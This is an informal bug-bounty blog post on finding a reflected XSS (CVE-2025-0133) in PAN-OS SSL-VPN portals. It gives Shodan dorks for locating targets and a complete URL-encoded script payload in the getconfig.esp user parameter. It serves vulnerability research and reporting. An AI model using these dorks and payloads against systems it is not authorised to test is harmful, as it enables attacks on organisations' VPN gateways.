How I Found XSS — CVE-2025–0133 Using Shodan
👋 Hey Everyone!
First of all, thank you so much for the support on my previous articles. 🙏
I know my English isn’t perfect, but I’m genuinely trying to share my experiences in bug hunting to help others — especially beginners. So please ignore small mistakes and focus on the value. 😊
🐞 Today’s Topic: Finding XSS (CVE-2025–0133) using Shodan
If you’re struggling with XSS vulnerabilities, this post might help you!
⚠️ I’m not going to explain what is XSS — because if you’re into bug bounty, you probably already know that. 😉
So let’s jump straight into the practical part!
🎯 Step 1: Pick a Wildcard Domain
Example:
*.target.com🧠 Step 2: Use Shodan Queries
Use these Shodan dorks to hunt for vulnerable domains running PAN-OS:
os:"PAN-OS" ssl.cert.subject.CN:"target.com"hostname:target.com os:"PAN-OS"Open any listed domain in your browser.
💥 Step 3: Test with XSS Payload
Use a payload like this:
/ssl-vpn/getconfig.esp?client-type=1&protocol-version=p1&app-version=3.0.1-10&clientos=Linux&os-version=linux-64&hmac-algo=sha1%2Cmd5&enc-algo=aes-128-cbc%2Caes-256-cbc&authcookie=12cea70227d3aafbf25082fac1b6f51d&portal=us-vpn-gw-N&user=%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Cscript%3Eprompt%28%22XSS%22%29%3C%2Fscript%3E%3C%2Fsvg%3E&domain=%28empty_domain%29&computer=computerhttp://target.com/ssl-vpn/getconfig.esp?client-type=1&protocol-version=p1&app-version=3.0.1-10&clientos=Linux&os-version=linux-64&hmac-algo=sha1%2Cmd5&enc-algo=aes-128-cbc%2Caes-256-cbc&authcookie=12cea70227d3aafbf25082fac1b6f51d&portal=us-vpn-gw-N&user=%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Cscript%3Eprompt%28%22XSS%22%29%3C%2Fscript%3E%3C%2Fsvg%3E&domain=(empty_domain)&computer=computerIf the site reflects the user parameter without sanitization — boom! XSS! 🎉
📸 Make a PoC & Report It
In my case — it was valid and accepted ✅
🔽 Bonus Tip:
- 🧠 Read Medium articles regularly
- 🐦 Follow XSS researchers on X (Twitter)
- 🔍 Watch for PAN-OS or SSL-VPN endpoints in Shodan
- 💬 Support & Connect
If you found this guide useful:
Leave a like/clap
Share with fellow bug hunters
Comment your thoughts or questions below
U can Check out my Linkedin Profile
Also, feel free to join my telegram channel for more bug hunting tips.
I’ll be happy to share more. 🙌
Happy Hunting 🐞🔎
— Everyone
